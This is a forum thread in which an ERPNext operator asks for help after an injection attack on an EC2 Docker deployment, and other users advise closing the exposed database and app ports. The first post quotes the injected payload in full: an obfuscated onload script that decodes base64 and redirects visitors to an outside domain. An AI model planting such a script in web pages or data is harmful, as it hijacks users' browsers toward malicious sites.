Seeking Assistance After SQL Injection Attack on ERPNext

cherrycharan · November 7, 2023, 10:02am

My ERPNext deployment was subjected to an SQL injection attack. The attacker was able to inject a malicious
<body/onload=eval(atob("d2luZG93LmxvY2F0aW9uLnJlcGxhY2UoImh0dHBzOi8vd3d3LnRvcHJldmVudWVnYXRlLmNvbS9jbmN0d2pkbj9rZXk9NzU0YTVmZGE2Mjk1N2M4MDc1NzdiOTEyYmFiOThlYzYiKQ=="))>

script into our MariaDB database, which redirected users to an unauthorized domain upon login. We identified and removed the malicious script from the tabFile table in the file_url field within MariaDB.

However, even after cleaning the database, the issue persists when switching to desk mode, anyone can suggest how to fix this ?

mujeerhashmi · November 7, 2023, 3:30pm

This is serious. What version are you on please give more details about your environment so that framework team can assist you.

cherrycharan · November 7, 2023, 5:50pm

github.com

cherrycharan/ERPnext-Deployment/blob/main/pwd.yml

version: "3"

services:
  # traefik:
  #   image: traefik:v2.5
  #   command:
  #     - --api.insecure=true
  #     - --providers.docker=true
  #     - --providers.docker.exposedbydefault=false
  #     - --entrypoints.web.address=:80
  #     - --entrypoints.websecure.address=:443
  #     - --entrypoints.webdashboard.address=:8081
  #     - --certificatesresolvers.myresolver.acme.httpchallenge=true
  #     - --certificatesresolvers.myresolver.acme.httpchallenge.entrypoint=web
  #     - --certificatesresolvers.myresolver.acme.email=email@yourdomain.in
  #     - --certificatesresolvers.myresolver.acme.storage=/letsencrypt/acme.json
  #     # Add dashboard configuration
  #     - --api.dashboard=true
  #   ports:
  #     - "80:80"

This file has been truncated. show original

Above is the Docker compose file i have used , I have modified according to my need . I was using Ec2 instance to deploy this

revant_one · November 8, 2023, 4:22am

Why are you publishing ports to host? Mariadb 3306, frontend 8080 is available for access? Are those ports protected by firewall?

You should only publish port 80 and 443 through nginx and only reverse proxy everything else from docker network without exposing host ports.

cherrycharan · November 9, 2023, 10:33am

The port 8080 is opened in Security groups of AWS Ec2 , I enabled port 3306 in security groups so that i can connect to mariadb from a dekstop database client like dbeaver.
Deployment became vulnerable because i exposed ports ?

revant_one · November 9, 2023, 4:37pm

hope your password is not admin and a more secure one which cannot be guessed easily.

DCRob · November 9, 2023, 6:59pm

I would think leaving a database port open is asking for trouble. At the very least you should limit IP address access.

How about using ssh and a private key to manage your DBMS instead? Most database management tools should support that.

max_morais_dmm · November 9, 2023, 9:17pm

you dont need to expose those ports!

To connect in MySQL with Dbeaver, just use they SSH tunnel connection!

It works like a charm for me!